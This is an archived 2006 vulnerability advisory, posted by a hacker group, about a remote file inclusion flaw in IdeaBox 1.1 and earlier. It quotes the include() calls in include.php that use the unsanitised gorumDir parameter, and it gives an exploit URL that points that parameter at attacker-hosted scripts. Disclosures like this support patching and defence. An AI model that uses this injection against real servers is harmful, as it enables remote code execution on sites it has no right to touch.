IdeaBox <= 1.1 (gorumDir) Remote File Include Vulnerability

2006-06-22T00:00:00
ID SECURITYVULNS:DOC:13286
Type securityvulns
Reporter Securityvulns
Modified 2006-06-22T00:00:00

Description

$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$ $$ $$ IdeaBox <= 1.1 (gorumDir) Remote File Include Vulnerability $$ script site: http://ideabox.phpoutsourcing.com/ $$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$ $$ Find by: Kacper (a.k.a Rahim) $$ $$ Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl $$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$ $$ Greetz: DragonHeart, Satan, Leito, Leon, Luzak, $$ Adam, DeathSpeed, Drzewko, pepi $$ $$ Specjal greetz: DragonHeart ;-) $$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ /* 19 Czerwca 2006r. Znikam na miesiac jade na wakacje :-)


19 June 2006 go to vacations !!!! I return for month, Cya ;-) */

include.php:

/ include("$gorumDir/generformlib_date.php"); include("$gorumDir/notification.php"); include("$gorumDir/zmail.php"); include("$ideaDir/user.php"); include("$ideaDir/globalsettings.php"); include("$ideaDir/init.php"); include("$ideaDir/idea.php"); include("$ideaDir/history.php"); include("$ideaDir/cord.php"); /

Expl:

http://www.site.com/[IdeaBox_path]/include.php?gorumDir=[evil_scripts]

Pozdro dla wszystkich ;-)